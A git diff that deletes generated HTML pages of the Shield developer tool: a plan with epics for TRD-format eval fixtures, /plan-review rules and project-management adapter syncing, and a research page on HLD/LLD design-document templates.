-<ul>
-<li><code>uv run shield/scripts/validate_plan.py &lt;path&gt;</code> exits 0 on valid sidecars and non-zero with a named error on invalid ones.</li>
-<li><code>/plan-review</code> invokes the validator before applying rubric checks and aborts on schema failure.</li>
-<li>Sidecar version forward-compat behavior matches the policy in <code>sidecar-schema.md</code>.</li>
-</ul>
-<hr />
-<h2 id="epic-3--eval-coverage-for-trd-format----m1">EPIC-3 · Eval coverage for TRD format  ·  M1</h2>
-<h3 id="epic-3-s1--author-positive-trd-eval-fixtures-backend--infra----priority-high">EPIC-3-S1 · Author positive TRD eval fixtures (backend + infra)  ·  <code>priority: high</code></h3>
-<p>Create <strong>two</strong> positive fixture <code>trd.md</code> files: one for a backend feature (full 14 sections populated with realistic content), one for an infra feature (full 14 sections with realistic content where infra interpretation applies; at least one section uses <code>n/a — &lt;reason&gt;</code> to exercise the escape pattern). The positive eval asserts: all 14 anchors present, each section non-empty OR carrying a valid <code>n/a — &lt;reason&gt;</code> line, slug allow-list matches.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Author <code>shield/evals/plan-trd/fixtures/positive-backend/trd.md</code> with all 14 sections (use Bytebite-style fictional feature so content is realistic).</li>
-<li>Author <code>shield/evals/plan-trd/fixtures/positive-infra/trd.md</code> with all 14 sections (use a fictional terraform/atmos change — e.g., new VPC module, new Aurora cluster — so content is realistic). At least one section must use <code>n/a — &lt;reason&gt;</code> (e.g., §4 Product Journey marked <code>n/a — declarative state change, no runtime path</code>).</li>
-<li>Author the corresponding <code>plan.json</code> sidecars with <code>design_refs[]</code> entries pointing at the fixture <code>trd.md</code> anchors.</li>
-<li>Write <code>shield/evals/plan-trd.yaml</code> with both positive cases wired.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><code>shield/evals/plan-trd/fixtures/positive-backend/trd.md</code> contains all 14 sections with explicit <code>{#section-id}</code> anchors.</li>
-<li><code>shield/evals/plan-trd/fixtures/positive-infra/trd.md</code> contains all 14 sections with explicit <code>{#section-id}</code> anchors and uses <code>n/a — &lt;reason&gt;</code> on at least one section.</li>
-<li>Running the eval on both positive fixtures passes (exit code 0).</li>
-<li>The fixtures are self-contained: no external API calls, no LLM dispatches.</li>
-</ul>
-<h3 id="epic-3-s2--author-missing-section--drift--vague-tbd-negative-fixtures----priority-high">EPIC-3-S2 · Author missing-section + drift + vague-TBD negative fixtures  ·  <code>priority: high</code></h3>
-<p>For each of the 14 required sections, author a fixture <code>trd.md</code> that omits that section. Add one drift-by-addition fixture (unprompted 15th section). Add one vague-TBD fixture (section present but contents are 'TBD' instead of either real content or <code>n/a — &lt;reason&gt;</code>). The eval must fail on each with a named, distinguishable error.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>For each section in the slug allow-list (14 entries), derive a positive fixture and remove only that section to create a negative fixture under <code>shield/evals/plan-trd/fixtures/missing-{section-id}/trd.md</code>.</li>
-<li>Wire each negative fixture into <code>shield/evals/plan-trd.yaml</code> with <code>expected_error</code> including the missing section's slug.</li>
-<li>Add one drift-by-addition negative fixture under <code>shield/evals/plan-trd/fixtures/extra-section/</code>: add an unprompted 15th section; eval fails with 'unexpected section'.</li>
-<li>Add one vague-TBD negative fixture under <code>shield/evals/plan-trd/fixtures/vague-tbd/</code>: §6 Non-Functional Requirements contains only 'TBD' (no real content, no <code>n/a — &lt;reason&gt;</code>); eval fails with 'vague section content'.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>14 missing-section negative fixtures exist, one per required section.</li>
-<li>Running the eval on each missing-section fixture fails with an error naming the missing section's slug.</li>
-<li>The drift-by-addition fixture fails with an 'unexpected section' error.</li>
-<li>The vague-TBD fixture fails with a 'vague section content' error (distinguishable from missing-section).</li>
-</ul>
-<h3 id="epic-3-s3--wire-eval-into-ci--red-green-paper-trail----priority-high">EPIC-3-S3 · Wire eval into CI / RED-GREEN paper trail  ·  <code>priority: high</code></h3>
-<p>Run the eval before and after the <code>/plan</code> command changes land to produce the RED→GREEN paper trail required by CLAUDE.md. Capture both runs in the implementation PR description.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Before any <code>/plan</code> command changes: run the eval and confirm RED (positive fixture missing <code>trd.md</code> → expected fail).</li>
-<li>After <code>/plan</code> changes land: run the eval and confirm GREEN (3 positive fixtures pass; all 16 negatives — 14 missing-section + 1 drift + 1 vague-TBD — fail with the right named errors).</li>
-<li>Capture both run outputs in the PR description.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>PR body contains a 'RED' section showing the eval failing before the changes.</li>
-<li>PR body contains a 'GREEN' section showing the eval passing 3 positives + failing all 16 negatives with named errors after the changes.</li>
-<li>The eval is invocable via <code>uv run shield/evals/run.py plan-trd</code> (or equivalent existing eval runner).</li>
-</ul>
-<hr />
-<h2 id="epic-4--plan-review-and-pm-sync-wiring----m2">EPIC-4 · /plan-review and /pm-sync wiring  ·  M2</h2>
-<h3 id="epic-4-s0--scaffold-jira--confluence--notion-adapter-packages----priority-high">EPIC-4-S0 · Scaffold Jira / Confluence / Notion adapter packages  ·  <code>priority: high</code></h3>
-<p>Only <code>shield/adapters/clickup/</code> exists today as a <code>uv</code> package. EPIC-4-S3 implies four adapters land in one story but three have no <code>pyproject.toml</code>, no <code>tests/</code>, no MCP server skeleton. Scaffold them first. New per Backend P0-3 (repo-grounded — verified).</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Create <code>shield/adapters/jira/</code> with <code>pyproject.toml</code>, <code>server/</code> skeleton, <code>tests/</code> with placeholder contract test, <code>.mcp.json</code> entry.</li>
-<li>Same for <code>shield/adapters/confluence/</code>.</li>
-<li>Same for <code>shield/adapters/notion/</code>.</li>
-<li>Create <code>shield/adapters/_common/design_refs.py</code> exposing <code>DesignRef</code>, <code>ForwardResult</code>, <code>ForwardError</code>, and the <code>forward_design_refs</code> protocol interface.</li>
-<li>Update top-level workspace pyproject if needed.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Each new adapter directory has a working <code>pyproject.toml</code> resolvable by <code>uv sync</code>.</li>
-<li>Each new adapter has a placeholder contract test runnable under <code>uv run pytest shield/adapters/&lt;tool&gt;/tests/</code>.</li>
-<li><code>shield/adapters/_common/design_refs.py</code> exports the named types and protocol.</li>
-<li><code>.mcp.json</code> entries for new adapters are present (even if disabled until EPIC-4-S3).</li>
-</ul>
-<h3 id="epic-4-s1--add-14-section-presence-rule--stale-anchor-rule-to-plan-review----priority-high">EPIC-4-S1 · Add 14-section presence rule + stale-anchor rule to /plan-review  ·  <code>priority: high</code></h3>
-<p>Extend the <code>/plan-review</code> rubric to check that <code>trd.md</code> contains all 14 required sections with the canonical slug anchors. Sections containing <code>n/a — &lt;reason&gt;</code> pass; sections containing only 'TBD' or empty content fail. Report missing or vague sections as Critical severity.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Edit <code>shield/skills/general/plan-review/SKILL.md</code> to add a 'TRD section presence' rule that imports the slug allow-list (14 entries) and checks each anchor exists in <code>trd.md</code>.</li>
-<li>Add a 'TRD section content' rule that, for each section, accepts either real content or a <code>n/a — &lt;reason&gt;</code> line; flags 'TBD'/empty.</li>
-<li>Add corresponding eval fixtures under <code>shield/evals/plan-review-trd/</code> exercising both rules (positive + missing-section + vague-TBD + n/a-without-reason).</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li><code>/plan-review</code> on a feature folder with a TRD missing any required section reports that section by slug as a Critical finding.</li>
-<li><code>/plan-review</code> on a feature folder with all 14 sections present (including any <code>n/a — &lt;reason&gt;</code> escapes) does not flag section presence or content.</li>
-<li><code>/plan-review</code> on a TRD with a section containing only 'TBD' flags it as a vague-content Critical finding.</li>
-<li><code>/plan-review</code> on a TRD with a section containing 'n/a' (no reason) flags it as a missing-reason finding.</li>
-</ul>
-<h3 id="epic-4-s2--add-prdtrd-duplication-detection-rule-to-plan-review----priority-medium">EPIC-4-S2 · Add PRD↔TRD duplication-detection rule to /plan-review  ·  <code>priority: medium</code></h3>
-<p>Detect when a TRD section verbatim-restates content from the linked PRD. Use a substring-overlap heuristic on §2 Problem Statement and §5 Functional Requirements.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Add a 'TRD restates PRD' rule to <code>/plan-review</code> that compares <code>trd.md</code> §2 + §5 against the linked <code>prd.md</code>.</li>
-<li>Define the substring-overlap threshold (e.g., flag if &gt; 80 characters of consecutive verbatim overlap).</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>A fixture pair where <code>trd.md</code> §2 copies <code>prd.md</code> problem section verbatim produces a duplication finding.</li>
-<li>A fixture pair where <code>trd.md</code> §2 paraphrases or summarizes the PRD problem section does not produce a finding.</li>
-</ul>
-<h3 id="epic-4-s3--pm-sync-emits-design_refs-as-web-links-with-idempotent-upsert----priority-high">EPIC-4-S3 · /pm-sync emits design_refs[] as web links with idempotent upsert  ·  <code>priority: high</code></h3>
-<p>Update <code>/pm-sync</code> adapters (ClickUp + Jira/Confluence/Notion from EPIC-4-S0) to forward each story's <code>design_refs[]</code> entries as web links on the synced task with a deterministic idempotency key. Adapter interface contract locked across all four; observability structured; tool/access requirements documented. Per Backend P0-1, P0-3, P0-4 + DX P1-3 + Backend P1-8 + DX P1-13.</p>
-<p><strong>Adapter file paths (P1-3)</strong></p>
-<ul>
-<li><code>shield/adapters/clickup/server/tools/sync.py</code> — extend existing</li>
-<li><code>shield/adapters/jira/server/tools/sync.py</code> — new (per EPIC-4-S0)</li>
-<li><code>shield/adapters/confluence/server/tools/sync.py</code> — new</li>
-<li><code>shield/adapters/notion/server/tools/sync.py</code> — new</li>
-</ul>
-<p><strong>Adapter interface contract (P0-3)</strong></p>
-<p>Each adapter exposes:</p>
-<pre><code class="language-python">def forward_design_refs(task_id: str, refs: list[DesignRef]) -&gt; ForwardResult: ...
-</code></pre>
-<p>where <code>ForwardResult = {created: int, skipped: int, errors: list[ForwardError]}</code>. Both <code>DesignRef</code> and <code>ForwardResult</code> are defined in <code>shield/adapters/_common/design_refs.py</code> (from EPIC-4-S0).</p>
-<p><strong>Idempotency key</strong>: each <code>DesignRef</code> produces <code>idempotency_key = sha256(story_id + anchor_url)[:32]</code>. Adapters use this as:</p>
-<ul>
-<li>Jira: <code>globalId</code> on <code>remote_issue_link</code></li>
-<li>Confluence: <code>name</code> on <code>remote_link</code></li>
-<li>ClickUp: comparison key for URL custom-field dedup before write</li>
-<li>Notion: comparison key for URL property dedup before write</li>
-</ul>
-<p><strong>Observability (P1-8)</strong>: one <code>action_log</code> entry per ref with <code>action='forward_design_ref'</code>, fields <code>{story_id, adapter, anchor_url, outcome, idempotency_key}</code>. Failures emit <code>action='forward_design_ref_failed'</code> with <code>{error_class, http_status, idempotency_key}</code>.</p>
-<p><strong>Tool &amp; access requirements (P1-13)</strong>:</p>
-<ul>
-<li>Integration tests use HTTP mocking via <code>responses</code> (preferred, credential-free CI) OR free-tier sandbox tenants when run live.</li>
-<li>Live credentials come from <code>SHIELD_&lt;ADAPTER&gt;_TOKEN</code> env vars; CI defaults to mocked mode.</li>
-<li>Python deps: Jira → <code>requests</code>; Confluence → <code>requests</code>; ClickUp → existing <code>httpx</code>; Notion → <code>requests</code>. All declared per-adapter.</li>
-</ul>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Edit <code>shield/commands/pm-sync.md</code> to describe the forwarding contract, idempotency key, and per-adapter affordances.</li>
-<li>Implement <code>forward_design_refs</code> in each of the four adapter files above.</li>
-<li>Adapters with no link affordance log <code>'design_refs forwarding skipped — adapter does not support web links'</code> instead of failing.</li>
-<li>Adapter eval fixtures using <code>responses</code> / <code>respx</code> HTTP mocking.</li>
-<li><strong>(P0-4) Per-adapter idempotency test</strong> under <code>shield/adapters/&lt;tool&gt;/tests/test_idempotency.py</code>: run <code>forward_design_refs</code> twice with the same input against a mocked remote; assert second call produces 0 <code>created</code> and N <code>skipped</code>.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Running <code>/pm-sync</code> against each of {Confluence, Jira, ClickUp, Notion} forwards <code>design_refs[]</code> URLs on the synced task.</li>
-<li>Running <code>/pm-sync</code> with empty <code>design_refs[]</code> succeeds with no side effect.</li>
-<li>Adapter fixtures pass in <code>shield/evals/</code>.</li>
-<li><strong>(P0-4)</strong> Running <code>/pm-sync</code> twice on the same plan produces no duplicates — verified by per-adapter idempotency test.</li>
-<li><strong>(P0-3)</strong> All four adapters implement the same <code>forward_design_refs(task_id, refs) → ForwardResult</code> signature from <code>_common/design_refs.py</code>.</li>
-<li><strong>(P1-8)</strong> <code>action_log</code> entries emitted per ref with the documented fields.</li>
-</ul>
-<hr />
-<h2 id="epic-5--drift--duplication-hardening----m3">EPIC-5 · Drift + duplication hardening  ·  M3</h2>
-<h3 id="epic-5-s1--add-last_aligned_with-metadata-to-planjson----priority-medium">EPIC-5-S1 · Add last_aligned_with metadata to plan.json  ·  <code>priority: medium</code></h3>
-<p>Add a top-level <code>last_aligned_with</code> field on <code>plan.json</code> that records the commit SHA of the most recent <code>/implement</code> run that closed a story. Countermeasure for undead-doc drift.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Bump <code>plan.json</code> schema to 1.3 to include <code>last_aligned_with: string | null</code>.</li>
-<li>Update <code>/implement</code> to write <code>last_aligned_with = HEAD-sha</code> after a story status flips to 'done'.</li>
-<li>Document semantics in <code>sidecar-schema.md</code>: <code>null</code> until first <code>/implement</code> run; updated on every subsequent story close.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>Fresh <code>plan.json</code> has <code>last_aligned_with: null</code>.</li>
-<li>After <code>/implement</code> closes a story, <code>plan.json</code> has <code>last_aligned_with: &lt;40-char hex sha&gt;</code>.</li>
-<li><code>/pm-sync</code> surfaces the value in the synced epic description.</li>
-</ul>
-<h3 id="epic-5-s2--add-implementation-manual--pseudo-code-lint-rule-to-plan-review----priority-low">EPIC-5-S2 · Add implementation-manual / pseudo-code lint rule to /plan-review  ·  <code>priority: low</code></h3>
-<p>Detect TRD §7 (HLD) sections that contain code blocks of more than N lines without an Alternatives Considered rationale within the same section — the 'design doc is really an implementation manual' anti-pattern from <code>research.md</code>.</p>
-<p><strong>Tasks</strong></p>
-<ul>
-<li>Add a 'implementation-manual detection' rule to <code>/plan-review</code>.</li>
-<li>Threshold: code block &gt; 20 lines triggers; rule passes if §8 Alternatives Considered is non-empty.</li>
-<li>Eval fixture: TRD with 30-line code block and empty §8 → flagged; TRD with 30-line code block and populated §8 → not flagged.</li>
-</ul>
-<p><strong>Acceptance criteria</strong></p>
-<ul>
-<li>A TRD with a &gt;20-line code block and an empty §8 produces a finding.</li>
-<li>A TRD with a &gt;20-line code block and a populated §8 does not produce a finding.</li>
-<li>Threshold is documented in the rule's <code>SKILL.md</code>.</li>
-</ul>
-<hr />
-<h2 id="out-of-scope-locked">Out of scope (locked)</h2>
-<table>
-<thead>
-<tr>
-<th>Item</th>
-<th>Status</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><code>/lld &lt;component&gt;</code> command</td>
-<td>Template locked at 14 sections per <a href="https://github.com/infraspecdev/tesseract/pull/43">PR #43 sample</a>; authoring command is a separate epic.</td>
-</tr>
-<tr>
-<td>Adapter auto-creation of design-doc pages in Confluence/Notion</td>
-<td>v2 enhancement.</td>
-</tr>
-<tr>
-<td>Structured ClickUp/Notion relationships beyond URL fields</td>
-<td>v2 enhancement.</td>
-</tr>
-<tr>
-<td>Migration tool for existing <code>plan-architecture.md</code></td>
-<td>Direct cutover; files stay readable in old folders.</td>
-</tr>
-</tbody>
-</table>
-<h2 id="next-steps">Next steps</h2>
-<ul>
-<li><code>/plan-review docs/shield/plan-trd-refactor-20260524/plan.json</code> — multi-agent review.</li>
-<li><code>/pm-sync docs/shield/plan-trd-refactor-20260524/plan.json --tool &lt;clickup|jira|notion&gt;</code> — sync to PM tool.</li>
-<li><code>/implement</code> — start with EPIC-3-S1 (positive eval fixture) to anchor the RED → GREEN trail per CLAUDE.md.</li>
-</ul>
-
-</main>
-<footer class="shield-footer">Generated by Shield</footer>
-</body>
-</html>
diff --git a/docs/shield/plan-trd-refactor-20260524/outputs/research.html b/docs/shield/plan-trd-refactor-20260524/outputs/research.html
deleted file mode 100644
index 7b673566..00000000
--- a/docs/shield/plan-trd-refactor-20260524/outputs/research.html
+++ /dev/null
@@ -1,837 +0,0 @@
-<!DOCTYPE html>
-<html lang="en">
-<head>
-<meta charset="UTF-8" />
-<meta name="viewport" content="width=device-width, initial-scale=1.0" />
-<title>Research — plan-trd-refactor-20260524</title>
-<link rel="stylesheet" href="../../shield.css" />
-<script defer src="../../manifest.js"></script>
-<script defer src="../../shield-nav.js"></script>
-<script type="module">
-  import mermaid from "https://cdn.jsdelivr.net/npm/mermaid@10/dist/mermaid.esm.min.mjs";
-  mermaid.initialize({ startOnLoad: false, theme: "default" });
-  document.addEventListener("DOMContentLoaded", () => mermaid.run({ querySelector: "pre.mermaid" }));
-</script>
-</head>
-<body data-shield-root="../../">
-<header class="shield-header">
-  <a class="brand" href="../../index.html">🛡 Shield</a>
-  <span class="bar-sep">|</span>
-  <nav class="crumb" id="shield-crumb"></nav>
-  <span class="bar-spacer"></span>
-  <div class="feat-wrap">
-    <button class="feat-btn" id="docs-toggle" aria-expanded="false">Features ▾</button>
-    <div class="feat-panel" id="docs-panel">
-      <input class="docs-search" id="docs-search" placeholder="Search docs…  (⌘K)" autocomplete="off" />
-      <div id="docs-results"></div>
-    </div>
-  </div>
-</header>
-<main class="shield-main">
-
-<nav class="toc">
-<div class="toc-title">Contents</div>
-<ul>
-<li><a href="#decision">Decision</a>
-<ul>
-<li><a href="#canonical-lld-template-14-sections--from-sample-pr-43">Canonical LLD template (14 sections — from sample PR #43)</a></li>
-</ul>
-</li>
-<li><a href="#why-not-keep-plan-architecturemd">Why Not Keep plan-architecture.md?</a>
-</li>
-<li><a href="#what-the-industry-recommends">What the Industry Recommends</a>
-<ul>
-<li><a href="#ieee-1016-2009--software-design-descriptions">IEEE 1016-2009 — Software Design Descriptions</a></li>
-<li><a href="#ian-sommerville-software-engineering-10th-ed-ch-6">Ian Sommerville, Software Engineering (10th ed., Ch. 6)</a></li>
-<li><a href="#roger-pressman-software-engineering-a-practitioners-approach-8th-ed">Roger Pressman, Software Engineering: A Practitioner&#x27;s Approach (8th ed.)</a></li>
-<li><a href="#malte-ubl--design-docs-at-google">Malte Ubl — &quot;Design Docs at Google&quot;</a></li>
-<li><a href="#will-larson--lethaincom">Will Larson — lethain.com</a></li>
-<li><a href="#gergely-orosz--the-pragmatic-engineer">Gergely Orosz — The Pragmatic Engineer</a></li>
-<li><a href="#simon-brown--the-c4-model">Simon Brown — The C4 model</a></li>
-<li><a href="#reference-trds-actual-practice-notion-workspace-internal-evidence">Reference TRD&#x27;s actual practice (Notion workspace, internal evidence)</a></li>
-</ul>
-</li>
-<li><a href="#how-this-works-in-practice--plan-refactor-flow">How This Works in Practice — /plan Refactor Flow</a>
-<ul>
-<li><a href="#story-to-design-section-reference-contract">Story-to-design-section reference contract</a></li>
-<li><a href="#de-duplication-contract-addresses-the-users-named-risk">De-duplication contract (addresses the user&#x27;s named risk)</a></li>
-</ul>
-</li>
-<li><a href="#failure-modes--countermeasures">Failure Modes &amp; Countermeasures</a>
-</li>
-<li><a href="#decisions-locked--open-questions">Decisions Locked &amp; Open Questions</a>
-<ul>
-<li><a href="#decisions-locked-with-the-user-2026-05-24--2026-05-25">Decisions locked with the user (2026-05-24 → 2026-05-25)</a></li>
-<li><a href="#open-questions-for-the-implementation-phase">Open questions for the implementation phase</a></li>
-</ul>
-</li>
-<li><a href="#migration-path--reversibility">Migration Path / Reversibility</a>
-</li>
-<li><a href="#summary">Summary</a>
-</li>
-<li><a href="#product-lens">Product Lens</a>
-<ul>
-<li><a href="#scorecard-pm1pm11">Scorecard (PM1–PM11)</a></li>
-<li><a href="#user-impact-analysis">User Impact Analysis</a></li>
-<li><a href="#scope-recommendation">Scope Recommendation</a></li>
-<li><a href="#prioritization-framework">Prioritization Framework</a></li>
-<li><a href="#stakeholder-summary">Stakeholder Summary</a></li>
-<li><a href="#critical-gaps--user-verdict-2026-05-24">Critical gaps — user verdict (2026-05-24)</a></li>
-</ul>
-</li>
-<li><a href="#references">References</a>
-<ul>
-<li><a href="#internal-references-notion--reference-workspace">Internal references (Notion — reference workspace)</a></li>
-<li><a href="#internal-references-shield-repo">Internal references (Shield repo)</a></li>
-</ul>
-</li>
-<li><a href="#further-exploration">Further Exploration</a>
-<ul>
-<li><a href="#books">Books</a></li>
-<li><a href="#long-form-blogs--articles">Long-form blogs / articles</a></li>
-<li><a href="#videos--talks">Videos / talks</a></li>
-<li><a href="#courses">Courses</a></li>
-<li><a href="#podcasts--podcast-episodes">Podcasts / podcast episodes</a></li>
-<li><a href="#other">Other</a></li>
-</ul>
-</li>
-</ul>
-</nav>
-<h1 id="hldlld-best-practices--refactor-shield-plan-to-produce-a-trd">HLD/LLD Best Practices — Refactor /shield plan to Produce a TRD</h1>
-<p><strong>Status:</strong> Proposed
-<strong>Date:</strong> 2026-05-24
-<strong>Context:</strong> Shield's <code>/plan</code> produces a stories-first work-breakdown plus a <code>plan-architecture.md</code> companion. Industry convention is HLD → LLD; Shield is missing the high-level-design layer that justifies the work-breakdown. This research informs a refactor where <code>/plan</code> will emit a <strong>TRD = HLD + PM-lens milestones</strong>, with a separate <strong>LLD</strong> authored later per milestone, and <strong>stories that reference both HLD and LLD sections</strong>.</p>
-<h2 id="decision">Decision</h2>
-<p><code>/plan</code> should emit a <strong>TRD</strong> that combines (a) a high-level design grounded in IEEE 1016 / Sommerville / Pressman section coverage, (b) PM-lens milestones derived from the HLD, (c) a Rollback Strategy section preserving the strongest property of today's <code>plan-architecture.md</code>, and (d) a story breakdown where each story has an additive <code>design_refs</code> array pointing to TRD and LLD sections. The TRD <strong>replaces</strong> today's <code>plan-architecture.md</code> (direct cutover, no feature flag, no side-by-side period).</p>
-<p><strong>The TRD applies to both backend and infrastructure work</strong> — same 14-section template, same anchor IDs, same eval, same <code>/plan-review</code> rubric. A few sections (Product Journey, Functional Requirements, APIs Involved) have domain-aware interpretation in the <code>/plan</code> prompt; pure-state changes can declare <code>n/a — &lt;reason&gt;</code> per section as the explicit escape (a pattern borrowed from the LLD sample's §12). Two genuinely-infra-favored properties of today's ADR-flavored <code>plan-architecture.md</code> are preserved in the unified template:</p>
-<ul>
-<li><strong>§8 Alternatives Considered</strong> — where the &quot;5 numbered decisions with trade-offs&quot; pattern lives (VPC peering vs Transit Gateway, Aurora vs RDS, single vs multi-region).</li>
-<li><strong>§14 Rollback Strategy</strong> — promoted to a first-class 14th section (terraform destroy plans, state recovery, blue/green flip back, traffic shift reversal for infra; data rollback, feature-flag toggle, key rotation, schema reversal for backend).</li>
-</ul>
-<p><strong>LLDs are component-scoped, not milestone-scoped.</strong> Each LLD document covers one C4-style Container or Component (a service, library, or module). A single LLD can be referenced by multiple milestones — milestone M1 and milestone M2 may both touch <code>lld-component-auth.md</code>, each updating different sections. The TRD §10 (Milestones) lists <em>which</em> LLDs each milestone touches; the LLDs themselves grow incrementally as milestones land. <strong>LLDs are typically authored for backend components</strong> where pre-implementation design has measurable value; infra plans rarely need an LLD layer since the declarative terraform/k8s code is the spec.</p>
-<p>The recommended TRD template, reconciled across the reference TRD template and the industry consensus core, is:</p>
-<ol>
-<li><strong>Document Overview</strong> — title, status, authors, related PRD link, date</li>
-<li><strong>Problem Statement</strong> — what user/business/operational problem (links PRD; doesn't restate it)</li>
-<li><strong>Objective &amp; Scope</strong> — goals, non-goals (Google design-doc convention)</li>
-<li><strong>Product Journey</strong> — end-to-end user flow (backend) / request lifecycle through the infra or operator journey (infra). <code>n/a — &lt;reason&gt;</code> permitted for pure-state changes.</li>
-<li><strong>Functional Requirements</strong> — what users can do (backend) / what the infra must support — capacity, regions, accounts, traffic patterns (infra). Links PRD where possible.</li>
-<li><strong>Non-Functional Requirements</strong> — SLAs, perf, security, observability (backend) / SLOs, RPO/RTO, cost ceiling, blast radius, multi-AZ tolerance (infra). Uber RFC convention.</li>
-<li><strong>High-Level Design</strong> — services + data flow (backend) / network topology + resource graph + dependency chain (infra). Block/sequence/architecture diagrams.</li>
-<li><strong>Alternatives Considered</strong> — what we didn't pick and why. <strong>For infra plans, this is where the ADR-style &quot;5 numbered decisions with trade-offs&quot; pattern lives</strong> — VPC peering vs Transit Gateway, Aurora vs RDS, single vs multi-region. Google + Larson convention.</li>
-<li><strong>Cross-Cutting Concerns</strong> — security, privacy, observability, multi-tenancy (backend) / IAM, encryption, observability, cost, multi-region, disaster recovery, compliance-region constraints (infra). Google + Uber.</li>
-<li><strong>Milestones</strong> — PM-lens phased breakdown derived from the HLD (backend) / phased rollout — dev → stage → prod, canary regions, blue/green flip, percentage cutover (infra). Reference TRD precedent.</li>
-<li><strong>APIs Involved</strong> — HTTP contracts touched (backend) / module interfaces + cloud-API surface + IAM boundaries + output values consumed by downstream stacks (infra).</li>
-<li><strong>Open Questions</strong> — known unknowns; surfaced for follow-up</li>
-<li><strong>References</strong> — links to PRD, LLDs (forward links, populated as LLDs land), ADRs, runbooks</li>
-<li><strong>Rollback Strategy</strong> — data rollback, feature-flag toggle, key rotation, schema reversal (backend) / terraform destroy plan, state recovery, blue/green flip back, traffic shift reversal (infra). Promoted from today's <code>plan-architecture.md</code> Rollback section.</li>
-</ol>
-<p>Each milestone in §10 declares which LLDs it touches. The LLDs are authored separately (a future <code>/lld &lt;component&gt;</code> command) and follow the C4 model's Container/Component levels — one LLD per service, library, or module. Stories in <code>plan.json</code> get an optional <code>design_refs[]</code> field with <code>{doc, section_id, anchor_url, label}</code> — additive, backward-compatible with <code>/pm-sync</code>.</p>
-<p><strong><code>n/a — &lt;reason&gt;</code> escape per section.</strong> Following the LLD sample's §12 pattern, any of the 14 sections may declare <code>n/a — &lt;reason&gt;</code> when the section genuinely doesn't apply (e.g., §4 Product Journey on a pure-state infra change). Vague TBDs and silent omissions are not allowed — the eval rejects them — but an explicit &quot;n/a&quot; with rationale passes. This keeps the structure intact across domains without forcing pretend-content.</p>
-<h3 id="canonical-lld-template-14-sections--from-sample-pr-43">Canonical LLD template (14 sections — from sample PR #43)</h3>
-<p>The LLD template is anchored in <a href="https://github.com/infraspecdev/tesseract/pull/43">tesseract PR #43</a> — <code>docs/superpowers/specs/2026-05-18-lld-sample.html</code> — a Bytebite user-signup sample that establishes the LLD shape Shield should generate:</p>
-<table>
-<thead>
-<tr>
-<th>#</th>
-<th>Section</th>
-<th>Always-on?</th>
-<th>Notes</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>1</td>
-<td>Overview</td>
-<td>Yes</td>
-<td>Names which epics/PRD milestones this LLD serves — bidirectional with TRD §10</td>
-</tr>
-<tr>
-<td>2</td>
-<td>Scope &amp; non-goals</td>
-<td>Yes</td>
-<td>In-scope/out-of-scope lists</td>
-</tr>
-<tr>
-<td>3</td>
-<td>Module layout</td>
-<td>Yes</td>
-<td>File tree with <code>new</code>/<code>mod</code>/<code>unchanged</code> badges</td>
-</tr>
-<tr>
-<td>4</td>
-<td>Data model</td>
-<td>Yes</td>
-<td>Tables + Redis/cache namespaces with column-level detail</td>
-</tr>
-<tr>
-<td>5</td>
-<td>API contracts</td>
-<td>Yes</td>
-<td>Per-endpoint request/response (each endpoint gets its own sub-anchor, e.g., <code>#api-create-user</code>)</td>
-</tr>
-<tr>
-<td>6</td>
-<td>Sequence flows</td>
-<td>Yes</td>
-<td>Mermaid sequence diagrams (each flow gets its own sub-anchor, e.g., <code>#flow-signup</code>)</td>
-</tr>
-<tr>
-<td>7</td>
-<td>Error handling</td>
-<td>Yes</td>
-<td>Error codes + behavior matrix</td>
-</tr>
-<tr>
-<td>8</td>
-<td>Concurrency &amp; state</td>
-<td>Yes</td>
-<td>Named race conditions and resolutions</td>
-</tr>
-<tr>
-<td>9</td>
-<td><strong>Configuration</strong></td>
-<td><strong>Promote-on-demand</strong></td>
-<td>Config values; lifted when the component needs them</td>
-</tr>
-<tr>
-<td>10</td>
-<td>Observability</td>
-<td>Yes</td>
-<td>Logs, metrics, traces</td>
-</tr>
-<tr>
-<td>11</td>
-<td><strong>Security &amp; privacy</strong></td>
-<td><strong>Promote-on-demand</strong></td>
-<td>Auth, PII, threats; lifted when the component touches user data</td>
-</tr>
-<tr>
-<td>12</td>
-<td>Performance &amp; scaling</td>
-<td>Yes — <strong>8 forced subsections</strong></td>
-<td>12.1 Load · 12.2 SLO · 12.3 Bottleneck · 12.4 Latency breakdown · 12.5 Capacity · 12.6 Scale-out lever · 12.7 Caches · 12.8 Degradation. <em>&quot;n/a — &lt;reason&gt;&quot;</em> is the only escape; vague prose is not allowed.</td>
-</tr>
-<tr>
-<td>13</td>
-<td>Open questions</td>
-<td>Yes</td>
-<td>Q#, question, options, owner, resolve-by table</td>
-</tr>
-<tr>
-<td>14</td>
-<td>Changelog</td>
-<td>Yes</td>
-<td>Every edit ties to a story ID + sections touched — closes the loop with <code>plan.json</code> <code>design_refs[]</code></td>
-</tr>
-</tbody>
-</table>
-<p><strong>Header metadata</strong> (above §1): Feature · Owner · Status · Linked PRD · Linked plans (plural — one LLD, many plans) · Version · Last updated.</p>
-<p><strong>Why this shape works for Shield:</strong></p>
-<ul>
-<li><strong>Per-component scope</strong> with <code>Linked plans</code> plural matches the user's &quot;same LLD doc covered across multiple milestones&quot; intent.</li>
-<li><strong>Stable kebab-case anchors</strong> on every section AND subsection — directly addresses Confluence-style anchor-rot the research surfaced.</li>
